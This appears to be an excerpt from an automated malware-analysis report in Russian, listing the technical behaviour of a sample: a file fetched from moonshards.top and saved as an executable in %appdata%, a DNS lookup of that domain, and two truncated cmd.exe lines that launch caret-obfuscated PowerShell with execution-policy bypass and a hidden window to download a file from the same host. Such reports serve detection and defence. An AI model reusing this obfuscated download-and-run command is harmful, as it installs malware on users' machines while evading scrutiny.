Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^ERS^H^EL^L.eXE -eX^eC^UtIo^nPol^Icy^ bYp^ass^ -N^OPROF^i^LE -wiND^oW^S^T^YLe ^HIDde^n ^(nE^w-oBJEC^t S^Y^S^Te^m.N^ET.We^B^c^lIenT^).doWN^l^oAdFILe^(^'http://moonshards.t...
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /C "PoW^ERS^H^EL^L.eXE -eX^eC^UtIo^nPol^Icy^ bYp^ass^ -N^OPROF^i^LE -wiND^oW^S^T^YLe ^HIDde^n ^(nE^w-oBJEC^t S^Y^S^Te^m.N^ET.We^B^c^lIenT^).doWN^l^oAdFILe^(^'http://moonshards.t...' (со скрытым окном)